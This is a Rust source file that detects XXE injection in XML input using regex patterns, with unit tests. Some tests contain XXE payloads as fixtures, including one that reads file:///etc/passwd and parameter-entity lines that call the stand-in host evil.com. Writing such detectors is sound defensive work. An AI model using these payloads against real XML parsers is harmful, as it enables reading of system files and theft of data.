use std::sync::OnceLock;
use regex::RegexSet;
static XXE_PATTERNS: OnceLock<RegexSet> = OnceLock::new();
static XXE_DESCRIPTIONS: &[&str] = &[
"XXE: DOCTYPE with ENTITY declaration",
"XXE: SYSTEM keyword in entity",
"XXE: ENTITY with file:// or http:// URI",
"XXE: Parameter entity (% entity)",
"XML billion laughs / entity expansion DoS",
"XXE: PUBLIC keyword in entity",
];
fn patterns() -> &'static RegexSet {
XXE_PATTERNS.get_or_init(|| {
RegexSet::new([
r"(?i)<!DOCTYPE\s+[^>]*\bENTITY\b",
r"(?i)<!ENTITY\s+[^>]*\bSYSTEM\b",
r#"(?i)<!ENTITY\s+[^>]*(file://|https?://|ftp://|php://|expect://)"#,
r"(?i)<!ENTITY\s+%\s+\w+",
r#"(?i)<!ENTITY\s+\w+\s+['"](&\w+;){2,}"#,
r"(?i)<!ENTITY\s+[^>]*\bPUBLIC\b",
])
.expect("XXE regex patterns must compile")
})
}
pub fn check_xxe(input: &str) -> Option<String> {
let set = patterns();
let matches: Vec<_> = set.matches(input).into_iter().collect();
if matches.is_empty() {
None
} else {
let idx = matches[0];
Some(
XXE_DESCRIPTIONS
.get(idx)
.unwrap_or(&"XXE injection")
.to_string(),
)
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn detects_basic_xxe() {
let payload =
r#"<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>"#;
assert!(check_xxe(payload).is_some());
}
#[test]
fn detects_http_xxe() {
let payload = r#"<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/steal">]>"#;
assert!(check_xxe(payload).is_some());
}
#[test]
fn detects_parameter_entity() {
let payload = r#"<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/evil.dtd">%xxe;]>"#;
assert!(check_xxe(payload).is_some());
}
#[test]
fn detects_billion_laughs() {
let payload = r#"<!DOCTYPE lol [<!ENTITY lol1 "&lol;&lol;&lol;">]>"#;
assert!(check_xxe(payload).is_some());
}
#[test]
fn allows_normal_xml() {
assert!(check_xxe("<root><item>hello</item></root>").is_none());
assert!(check_xxe(r#"<?xml version="1.0"?><data/>"#).is_none());
}
#[test]
fn allows_normal_text() {
assert!(check_xxe("This is a normal comment").is_none());
}
}